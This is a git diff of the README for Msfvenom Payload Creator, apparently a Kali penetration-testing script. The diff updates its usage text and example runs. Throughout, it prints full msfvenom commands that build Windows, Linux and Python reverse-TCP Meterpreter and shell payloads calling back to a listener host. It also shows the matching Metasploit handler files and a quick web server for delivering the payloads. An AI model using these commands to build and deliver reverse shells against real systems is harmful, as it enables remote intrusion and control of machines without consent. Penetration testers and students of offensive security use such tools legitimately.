diff --git a/README.md b/README.md index b242514..20cba46 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework). -![Msfvenom Payload Creator (MPC)](https://i.imgur.com/pLmIlAm.png) +![Msfvenom Payload Creator (MPC)](https://i.imgur.com/0q41eqR.png) - - - @@ -29,88 +29,116 @@ mpc ``` bash root@kali:~# mpc - [*] Msfvenom Payload Creator (MPC v1.1) + [*] Msfvenom Payload Creator (MPC v1.2) + + [i] /usr/bin/mpc () () () () () () + [i] Example: /usr/bin/mpc windows 192.168.1.10 # Windows & manual IP. + [i] /usr/bin/mpc elf eth0 4444 # Linux, eth0's IP & manual port. + [i] /usr/bin/mpc stageless cmd py verbose # Python, stageless command prompt. + [i] /usr/bin/mpc loop eth1 # A payload for every type, using eth1's IP. + [i] /usr/bin/mpc msf batch eth1 # All possible Meterpreter payloads, using eth1's IP. - [i] ./mpc.sh () () [i] : (All reverse TCP payloads) - [i] + ASP (meterpreter) - [i] + ASPX (meterpreter) - [i] + Bash [.sh] (shell) - [i] + Java [.jsp] (shell) - [i] + Linux [.elf] (meterpreter) - [i] + OSX [.macho] (shell) - [i] + Perl [.pl] (shell) - [i] + PHP (meterpreter) - [i] + Powershell [.ps1] (meterpreter) - [i] + Python [.py] (meterpreter) - [i] + Tomcat [.war] (shell) - [i] + Windows [.exe] (meterpreter) - [i] Missing will default to IP menu - [i] Missing will default to 443 + [i] + ASP + [i] + ASPX + [i] + Bash [.sh] + [i] + Java [.jsp] + [i] + Linux [.elf] + [i] + OSX [.macho] + [i] + Perl [.pl] + [i] + PHP + [i] + Powershell [.ps1] + [i] + Python [.py] + [i] + Tomcat [.war] + [i] + Windows [.exe] + + [i] Rather than putting , you can do a interface and MPC will detect that IP address. + [i] Missing will default to the IP menu. + + [i] Missing will default to 443. + + [i] splits the payload into parts, making it smaller but dependant on Metasploit. + [i] is the complete standalone payload. More 'stabe' than . + [i] Missing will default to . + [i] Note: Metasploit doesn't (yet!) support for every format. + + [i] is a standard/native command prompt/terminal to interactive with. + [i] is a custom cross platform Meterpreter shell, gaining the full power of Metasploit. + [i] Note: Metasploit doesn't (yet!) support / for every format. + [i] Missing will default to Meterpreter. + + [i] will generate as many combinations as possible: , & . + [i] will just create one of each . + + [i] will display more information during the process. root@kali:~# ``` -## Example \#1 (Windows Fully Automated With IP And Port) +## Example \#1 (Windows, Fully Automated With IP) ```bash -root@kali:~# mpc windows 192.168.155.175 4444 - [*] Msfvenom Payload Creator (MPC v1.1) - [i] IP: 192.168.155.175 - [i] PORT: 4444 - [i] TYPE: windows (windows/meterpreter/reverse_tcp) - [i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.155.175 LPORT=4444 -o /root/windows-meterpreter.exe - [i] windows meterpreter created: '/root/windows-meterpreter.exe' - [i] MSF handler file: '/root/windows-meterpreter-exe.rc' (msfconsole -q -r /root/windows-meterpreter-exe.rc) - [?] Quick web server? python -m SimpleHTTPServer 8080 +root@kali:~# mpc windows 192.168.1.10 + [*] Msfvenom Payload Creator (MPC v1.2) + [i] IP: 192.168.1.10 + [i] PORT: 443 + [i] TYPE: windows (windows/meterpreter_reverse_tcp) + [i] CMD: msfvenom -p windows/meterpreter_reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 -o /root/windows-stageless-meterpreter-443.exe + [i] windows meterpreter created: '/root/windows-stageless-meterpreter-443.exe' + [i] MSF handler file: '/root/windows-stageless-meterpreter-443-exe.rc' (msfconsole -q -r /root/windows-stageless-meterpreter-443-exe.rc) + [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~# ``` -## Example \#2 (Linux Fully Automated With Interface And Format) +## Example \#2 (Linux Format, Fully Automated With Interface and Port) ```bash -root@kali:~# ./mpc.sh elf eth0 - [*] Msfvenom Payload Creator (MPC v1.1) - [i] IP: 127.0.0.1 - [i] PORT: 443 - [i] TYPE: linux (linux/x86/meterpreter/reverse_tcp) - [i] CMD: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=127.0.0.1 LPORT=443 -o /root/linux-meterpreter.elf - [i] linux meterpreter created: '/root/linux-meterpreter.elf' - [i] MSF handler file: '/root/linux-meterpreter-elf.rc' (msfconsole -q -r /root/linux-meterpreter-elf.rc) - [?] Quick web server? python -m SimpleHTTPServer 8080 +root@kali:~# ./mpc elf eth0 4444 + [*] Msfvenom Payload Creator (MPC v1.2) + [i] IP: 192.168.103.240 + [i] PORT: 4444 + [i] TYPE: linux (linux/x86/meterpreter/reverse_tcp) + [i] CMD: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.240 LPORT=4444 -o /root/linux-staged-meterpreter-4444.elf + [i] linux meterpreter created: '/root/linux-staged-meterpreter-4444.elf' + [i] MSF handler file: '/root/linux-staged-meterpreter-4444-elf.rc' (msfconsole -q -r /root/linux-staged-meterpreter-4444-elf.rc) + [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~# ``` -## Example \#3 (PHP Using Interactive IP Menu) +## Example \#3 (Python Format, Stageless Command Prompt Using Interactive IP Menu) ```bash -root@kali:~# bash mpc.sh php - [*] Msfvenom Payload Creator (MPC v1.1) +root@kali:~# bash mpc.sh stageless cmd py verbose + [*] Msfvenom Payload Creator (MPC v1.2) [i] Use which interface/IP address?: - [i] 1.) eth0 - 192.168.103.140 + [i] 1.) eth0 - 192.168.103.240 [i] 2.) eth1 - 192.168.155.175 [i] 3.) lo - 127.0.0.1 - [?] Select 1-3, interface or IP address: 1 - - [i] IP: 192.168.103.140 - [i] PORT: 443 - [i] TYPE: php (php/meterpreter/reverse_tcp) - [i] CMD: msfvenom -p php/meterpreter/reverse_tcp -f raw --platform php -e generic/none -a php LHOST=192.168.103.140 LPORT=443 -o /root/php-meterpreter.php - [i] php meterpreter created: '/root/php-meterpreter.php' - [i] MSF handler file: '/root/php-meterpreter-php.rc' (msfconsole -q -r /root/php-meterpreter-php.rc) - [?] Quick web server? python -m SimpleHTTPServer 8080 + [?] Select 1-3, interface or IP address: 2 + + [i] IP: 192.168.155.175 + [i] PORT: 443 + [i] TYPE: python (python/shell_reverse_tcp) + [i] STAGE: stageless + [i] SHELL: shell + [i] CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.155.175 LPORT=443 -o /root/python-stageless-shell-443.py + [i] python shell created: '/root/python-stageless-shell-443.py' + [i] MSF handler file: '/root/python-stageless-shell-443-py.rc' (msfconsole -q -r /root/python-stageless-shell-443-py.rc) + [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~# ``` +![Examples](https://i.imgur.com/m4lG23l.png) + - - - ## To-Do List -* Cleaner command line arguments (e.g. `-ip 127.0.0.1`, `-v` etc) * Display file stats (e.g. file, size, md5/sha1) _Commands are in, just commented out._ -* Support different payloads (e.g. `standard shells`/`nc` & `reverse_http`/`reverse_https`, `bind` etc) +* Support different payloads (e.g. `reverse_http`/`reverse_https`, `bind`, `find_port` etc) * x64 payloads +* external IP/WAN * _...IPv6 support?_